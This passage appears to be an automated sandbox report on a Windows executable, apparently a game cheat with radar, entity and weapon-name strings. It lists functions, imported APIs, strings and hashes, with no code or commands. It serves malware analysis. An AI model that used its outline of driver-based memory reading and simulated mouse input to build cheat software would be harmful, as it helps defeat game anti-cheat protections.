String ID: ##radar$Hands$Nearby Entities: $Unranked$VUUU$Visible Entities:
API String ID: 460599277-1119963227
Opcode ID: e9f1ffbf48534ec4e5ef1f142d6b439e782f0104ddf7e0d8599e76680e62f97d
Instruction ID: cbbdfbd4ec33c6de8415277b31eb8e9d22575fe986460dc8ceb976e626a0d42e
Opcode Fuzzy Hash: e9f1ffbf48534ec4e5ef1f142d6b439e782f0104ddf7e0d8599e76680e62f97d
Instruction Fuzzy Hash: D1322A36A58A42C6EB20CF25D89567833A1FF9DF84F08453AD90D836BADF3DA449C711

Function 00007FF68B4CBAFC Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF68B4CBBA9
GetLastError.KERNEL32 ref: 00007FF68B4CBBB3
FindFirstFileW.KERNEL32 ref: 00007FF68B4CBBCA
GetLastError.KERNEL32 ref: 00007FF68B4CBBD6
FindClose.KERNEL32 ref: 00007FF68B4CBBE4
__std_fs_open_handle.LIBCPMT ref: 00007FF68B4CBC77
CloseHandle.KERNEL32 ref: 00007FF68B4CBC8D
CloseHandle.KERNEL32 ref: 00007FF68B4CBE0A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CBE14

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: 13584466c64051da762a6bc05535db6d7cfca919f33879a3c0286c16851a0640
Instruction ID: c229d9b5319b453e8ee10768195010b1d6843d72361f27f6293e87773acdf0ab
Opcode Fuzzy Hash: 13584466c64051da762a6bc05535db6d7cfca919f33879a3c0286c16851a0640
Instruction Fuzzy Hash: 6A914231A48E46C6E6648B25A86667522A0BF49FB4F144738DA7E876F8DF3CE50DC700

Function 00007FF68B4BECD0 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1B5
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1D0
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF1E9
sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4BF207
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BF307

Part of subcall function 00007FF68B4CA9F8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF68B492AC0), ref: 00007FF68B4CAA08

mouse_event.USER32 ref: 00007FF68B4BF2A9

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE8F8

Part of subcall function 00007FF68B4BE8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE998

Part of subcall function 00007FF68B4BE8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4BE9B6

Part of subcall function 00007FF68B4BE8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68B4B18E5), ref: 00007FF68B4BE975

Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E

mouse_event.USER32 ref: 00007FF68B4BF2C1

Strings

TacticalShotgun, xrefs: 00007FF68B4BEDBC
SingleShotgun, xrefs: 00007FF68B4BEEA1
ChargeShotgun, xrefs: 00007FF68B4BEDE3
DoubleBarrelShotgun, xrefs: 00007FF68B4BEE55
DragonBreathShotgun, xrefs: 00007FF68B4BEE2F
AutoShotgun, xrefs: 00007FF68B4BEE7B
PumpShotgun, xrefs: 00007FF68B4BED96
SlugShotgun, xrefs: 00007FF68B4BEEED
CombatShotgun, xrefs: 00007FF68B4BEEC7
LeverActionShotgun, xrefs: 00007FF68B4BEE09

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpymouse_event$AcquireConcurrency::cancel_current_taskExclusiveLockmallocsqrt
String ID: AutoShotgun$ChargeShotgun$CombatShotgun$DoubleBarrelShotgun$DragonBreathShotgun$LeverActionShotgun$PumpShotgun$SingleShotgun$SlugShotgun$TacticalShotgun
API String ID: 2172613484-4283324268
Opcode ID: f00969fdb4ff0c3ce3e3af59dfc74dc10e8458fb6e2fc563d7efd804f5d31e57
Instruction ID: c490c85eddecac2f0ec2a706cfdf81fefad35c23b08cb44166e726743d85de82
Opcode Fuzzy Hash: f00969fdb4ff0c3ce3e3af59dfc74dc10e8458fb6e2fc563d7efd804f5d31e57
Instruction Fuzzy Hash: 1F02E222E14A86C4E720CF35D8422B97360FF9D794F54533AEA5C976BADF78A585C300

Function 00007FF68B49F8F0 Relevance: 26.0, APIs: 20, Instructions: 1048COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49F9B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49F9D7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FAB1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FADD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FB7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FC28
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FC4B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49FC75
memset.VCRUNTIME140 ref: 00007FF68B49FC8D
memset.VCRUNTIME140 ref: 00007FF68B49FC9B
memset.VCRUNTIME140 ref: 00007FF68B49FCA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A01C5
memset.VCRUNTIME140 ref: 00007FF68B4A01DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A03BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A03DA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A0833
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A0854
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A0875
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A0414

Part of subcall function 00007FF68B4A1180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF68B4A09B3), ref: 00007FF68B4A11E3
Part of subcall function 00007FF68B4A1180: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF68B4A09B3), ref: 00007FF68B4A1214

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4A09F5

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free$malloc$memset
String ID:
API String ID: 1620901979-0
Opcode ID: ceb6fe30e33f1f34d47d6dc1dfc47ae5b6fcf571356623effa51148eb56a66ee
Instruction ID: c08aea35b556724a17c326eeb61dab760ea645dbcad00af5dbd4978c949ec365
Opcode Fuzzy Hash: ceb6fe30e33f1f34d47d6dc1dfc47ae5b6fcf571356623effa51148eb56a66ee
Instruction Fuzzy Hash: 66B2AF32A04784CAE755CF26D0416AD77B4FF49B88F05923ADE49A37A9DF38E495CB00

Function 00007FF68B495DF0 Relevance: 15.8, APIs: 10, Instructions: 830COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B495F2F
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4964C7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4964F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49699A
memcpy.VCRUNTIME140 ref: 00007FF68B4969BD
memcpy.VCRUNTIME140 ref: 00007FF68B4969D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4969F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B496A1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B496A57
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B496A7C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free$mallocmemcpysqrtf
String ID:
API String ID: 943526449-0
Opcode ID: cb44fdcdf71a0be0250223b21cb3b71f60db58ac696eae73ad42354c0a5d3fc3
Instruction ID: 7a5be34d9ebf237a2425f84c175bd57d95f503bbd8b0ed4b8eca7fddc90a28b5
Opcode Fuzzy Hash: cb44fdcdf71a0be0250223b21cb3b71f60db58ac696eae73ad42354c0a5d3fc3
Instruction Fuzzy Hash: 62727A12E28BE885E3128B36514227AA6D1BF6E784F1DD726ED44E7676EF3CE441C700

Function 00007FF68B4B2F10 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF68B4B2FB8
asin.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B306E
atan2.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B30A1

Part of subcall function 00007FF68B4B1B70: DeviceIoControl.KERNEL32 ref: 00007FF68B4B1BE1

sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B31BB
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B31C7
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B31D5
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B31E6
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B31F3
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B3200
tanf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B32B6

Part of subcall function 00007FF68B4C8050: DeviceIoControl.KERNEL32 ref: 00007FF68B4C8109

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: cosfsinf$ControlDevice$asinatan2memsettanf
String ID:
API String ID: 1330759842-0
Opcode ID: 21291bbf4ffbfd79faf99a590387d54dc945600902d7cfb14d02a13a3436941a
Instruction ID: dad43f55e7ccc944ad85c12ad83eaff45b619faa7720d7df1b960c883b61e452
Opcode Fuzzy Hash: 21291bbf4ffbfd79faf99a590387d54dc945600902d7cfb14d02a13a3436941a
Instruction Fuzzy Hash: 1ED1E822D28F8585E2139B3654522BAA354BF6F3D4F199326F94D72677EF38A1C2C700

Function 00007FF68B492A90 Relevance: 15.1, APIs: 10, Instructions: 149clipboardCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B492B14
OpenClipboard.USER32 ref: 00007FF68B492B23

Part of subcall function 00007FF68B4CA9F8: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF68B492AC0), ref: 00007FF68B4CAA08

GetClipboardData.USER32 ref: 00007FF68B492B3F
CloseClipboard.USER32 ref: 00007FF68B492B4D

Part of subcall function 00007FF68B4CA98C: AcquireSRWLockExclusive.KERNEL32(?,?,?,00007FF68B492AEF), ref: 00007FF68B4CA99C
Part of subcall function 00007FF68B4CA98C: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00007FF68B492AEF), ref: 00007FF68B4CA9DC

GlobalLock.KERNEL32 ref: 00007FF68B492B68
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B492C35
memcpy.VCRUNTIME140 ref: 00007FF68B492C54
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B492C77
GlobalUnlock.KERNEL32 ref: 00007FF68B492CB6
CloseClipboard.USER32 ref: 00007FF68B492CBC

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ClipboardLock$Exclusive$AcquireCloseGlobalfree$DataOpenReleaseUnlockmallocmemcpy
String ID:
API String ID: 2057792927-0
Opcode ID: afb75d6a5a88d81a88b4b35408aecbec497361a3e84a9b1daa9cb3821554377a
Instruction ID: 52e8bf99682871c87dce11b592740ff92c28d5b2ce75d6d29f718339a65d2aea
Opcode Fuzzy Hash: afb75d6a5a88d81a88b4b35408aecbec497361a3e84a9b1daa9cb3821554377a
Instruction Fuzzy Hash: CF514B21A0A602C2FA649F19E99627962A0FF4CB84F48443DD91EC73BADF3CF585C340

Function 00007FF68B4AA160 Relevance: 14.2, APIs: 5, Strings: 1, Instructions: 3667stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF68B4AA7AD
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF68B4AC0F9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4AC21D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4AC36B
fmodf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AD5CB

Strings

#SCROLLY, xrefs: 00007FF68B4AA64C, 00007FF68B4ACCC4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: fmodffreemallocmemcpystrncpy
String ID: #SCROLLY
API String ID: 511038203-1064663049
Opcode ID: b19d77ac789cdbe29c9194ad78d8f6bb0c068b789d2cf2a92529c42ea69059c1
Instruction ID: 3160b18c214b4ea7315c83d82560d94143b95c879e8dcdc4b5b182cfb11ab86b
Opcode Fuzzy Hash: b19d77ac789cdbe29c9194ad78d8f6bb0c068b789d2cf2a92529c42ea69059c1
Instruction Fuzzy Hash: ED73F732E08686CAE751CA3684422B96790FF1D784F196739DE49B76B9DF29F448CF00

Function 00007FF68B4B9B40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON

Download Yara Rule

APIs

__stdio_common_vsnprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68B4B9BDC
MultiByteToWideChar.KERNEL32 ref: 00007FF68B4B9BFE
memset.VCRUNTIME140 ref: 00007FF68B4B9C2C
MultiByteToWideChar.KERNEL32 ref: 00007FF68B4B9C45

Part of subcall function 00007FF68B4C7690: memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C76FA

WideCharToMultiByte.KERNEL32 ref: 00007FF68B4B9C92
memset.VCRUNTIME140 ref: 00007FF68B4B9CB3
WideCharToMultiByte.KERNEL32 ref: 00007FF68B4B9CDA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9D48

Part of subcall function 00007FF68B4A1A40: memchr.VCRUNTIME140 ref: 00007FF68B4A1B96
Part of subcall function 00007FF68B4A1A40: memchr.VCRUNTIME140 ref: 00007FF68B4A1BF8

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BA2F6

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
String ID:
API String ID: 3704722475-0
Opcode ID: e6e141a76f4e5f3bbba2b472fb7d4bd3583d7bd85d57cab17a705577fc0dda16
Instruction ID: 6d07396ef466a866ef8c87b9ba20f1088eb243840883a377fc5e103234086c11
Opcode Fuzzy Hash: e6e141a76f4e5f3bbba2b472fb7d4bd3583d7bd85d57cab17a705577fc0dda16
Instruction Fuzzy Hash: A122DC32A18B84C5E711CF65E4412AD7760FF98B98F04933AEE8D67A69DF78E184C700

Function 00007FF68B4CB548 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF68B4CB564
memset.VCRUNTIME140 ref: 00007FF68B4CB588
RtlCaptureContext.NTDLL ref: 00007FF68B4CB591
RtlLookupFunctionEntry.NTDLL ref: 00007FF68B4CB5AB
RtlVirtualUnwind.NTDLL ref: 00007FF68B4CB5EC
memset.VCRUNTIME140 ref: 00007FF68B4CB61F
IsDebuggerPresent.KERNEL32 ref: 00007FF68B4CB640
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF68B4CB65D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF68B4CB668

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 4b425470dafeb125ad6e4cea48ddc885b8a0de9b9862f8a9bb31daf75116dafd
Instruction ID: 173fb17f6b87059ba78694433c3ffb18df1d7a5748a9bbd124ce015723cd470b
Opcode Fuzzy Hash: 4b425470dafeb125ad6e4cea48ddc885b8a0de9b9862f8a9bb31daf75116dafd
Instruction Fuzzy Hash: AE314F72604B85C6EB609F60E8517E97364FB48B48F44443ADB4E87BA8DF38D64CC710

Function 00007FF68B4997A0 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B499892
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4998C0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4998EF
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49991A
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B499B18
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B499B46
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B499B75
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B499BA0

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: 2dc1d86fca427c9c0bc5c93b8922f844cb79463381ea3272e2c15cb29c3e3054
Instruction ID: 22789ee8f8711d3572213d5b2b9600ea320ca636ca08ada8375ac44dce43e755
Opcode Fuzzy Hash: 2dc1d86fca427c9c0bc5c93b8922f844cb79463381ea3272e2c15cb29c3e3054
Instruction Fuzzy Hash: 6BB18522E28BCC81E123963754821F9E250AFBF3C5F2DDB27F984766B6DF2461D19640

Function 00007FF68B492CE0 Relevance: 12.1, APIs: 8, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF68B492CEB
GlobalAlloc.KERNEL32 ref: 00007FF68B492D5E
GlobalLock.KERNEL32 ref: 00007FF68B492D6F
GlobalUnlock.KERNEL32 ref: 00007FF68B492DC1
EmptyClipboard.USER32 ref: 00007FF68B492DC7
SetClipboardData.USER32 ref: 00007FF68B492DD5
GlobalFree.KERNEL32 ref: 00007FF68B492DE3
CloseClipboard.USER32 ref: 00007FF68B492DE9

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: 303681f9e7cbe62765dbfb0a9134f4b8150c769aead48dd747dc0cc04bc40eea
Instruction ID: 0b75cf31c9d2706324ad1030bbf65be54deb88297ffa9eea7740a24ed10f8407
Opcode Fuzzy Hash: 303681f9e7cbe62765dbfb0a9134f4b8150c769aead48dd747dc0cc04bc40eea
Instruction Fuzzy Hash: AC319E21A48A42C6EA209B10E55627DE3A1FF4CF90F084638DA9D877BCDE3CE049C704

Function 00007FF68B49C550 Relevance: 9.9, APIs: 6, Instructions: 873COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49C75E
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49C7F2
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49C88C
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49C918
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49C9F7
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49D26E

Memory Dump Source

